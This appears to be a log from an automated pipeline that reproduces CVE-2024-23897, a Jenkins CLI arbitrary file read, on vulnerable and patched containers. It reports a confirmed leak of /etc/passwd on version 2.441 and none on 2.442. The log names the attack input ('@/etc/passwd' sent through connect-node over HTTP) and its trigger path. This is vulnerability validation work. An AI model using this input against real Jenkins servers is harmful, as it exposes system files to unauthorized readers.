[*] Project cache dir: /data/pruva/project-cache/1b32eb77-2993-4f6d-b197-c6547e683bde
[*] CVE-2024-23897 reproduction - Jenkins CLI @-file expansion arbitrary file read
[*] Vulnerable: jenkins/jenkins:2.441-jdk17
[*] Fixed: jenkins/jenkins:2.442-jdk17
[*] Container jenkins-vuln already running
[+] Jenkins vuln ready
{ "entrypoint_kind": "api_remote", "entrypoint_detail": "jenkins-cli-over-http", "service_started": true, "healthcheck_passed": true, "target_path_reached": false, "runtime_stack": [ "docker", "jenkins-controller", "jenkins-cli-http" ], "proof_artifacts": [ "logs/vuln_attempt1.log", "logs/vuln_attempt2.log", "logs/fixed_attempt1.log", "logs/fixed_attempt2.log", "logs/cli_vuln.out", "logs/cli_fixed.out", "logs/docker_vuln.log", "logs/docker_fixed.log", "logs/cli_vuln_help.out", "logs/whoami_vuln.out", "logs/whoami_fixed.out", "logs/reproduction_steps.log", "logs/vuln_passwd_ground_truth.txt", "logs/fixed_passwd_ground_truth.txt" ], "notes": "vuln jenkins up, running exploit" }
[*] vuln CLI jar cached
[*] Ground-truth /etc/passwd lines in vuln container: 19
[*] Vuln file-leak: true (matched 19 / 19 ground-truth lines)
[*] Container jenkins-fixed already running
[+] Jenkins fixed ready
[*] fixed CLI jar cached
[*] Fixed file-leak: false
==================== RESULTS ====================
Vulnerable (2.441) file leak: true (19/19 lines confirmed)
Fixed (2.442) file leak: false
================================================
[+] CONFIRMED: CVE-2024-23897 reproduced.
{ "entrypoint_kind": "api_remote", "entrypoint_detail": "jenkins-cli-over-http (connect-node @/etc/passwd)", "service_started": true, "healthcheck_passed": true, "target_path_reached": true, "runtime_stack": [ "docker", "jenkins-controller", "jenkins-cli-http" ], "proof_artifacts": [ "logs/vuln_attempt1.log", "logs/vuln_attempt2.log", "logs/fixed_attempt1.log", "logs/fixed_attempt2.log", "logs/cli_vuln.out", "logs/cli_fixed.out", "logs/docker_vuln.log", "logs/docker_fixed.log", "logs/cli_vuln_help.out", "logs/whoami_vuln.out", "logs/whoami_fixed.out", "logs/reproduction_steps.log", "logs/vuln_passwd_ground_truth.txt", "logs/fixed_passwd_ground_truth.txt" ], "notes": "CONFIRMED: vulnerable 2.441 leaked /etc/passwd via CLI @-file expansion over HTTP (19 lines matched ground truth); fixed 2.442 blocked it." }
[+] RCA report written to /data/pruva/runs/b296fdc1-6e55-413e-baec-395e18ca3a2f/bundle/repro/rca_report.md
{ "claim_outcome": "partial", "claim_block_reason": "impact_mismatch", "repro_result": "confirmed", "validated_surface": "api_remote", "evidence_scope": "production_path", "claimed_impact_class": "code_execution", "observed_impact_class": "info_leak", "exploitability_confidence": "high", "attacker_controlled_input": "@/etc/passwd CLI argument over HTTP", "trigger_path": "jenkins-cli.jar -> HTTP /cli -> CLICommand.main -> args4j expandAtFiles -> file read -> error echo", "end_to_end_target_reached": true, "sanitizer_used": false, "crash_observed": false, "read_write_primitive_observed": false, "exploit_chain_demonstrated": false, "blocking_mitigation": null, "inferred": false }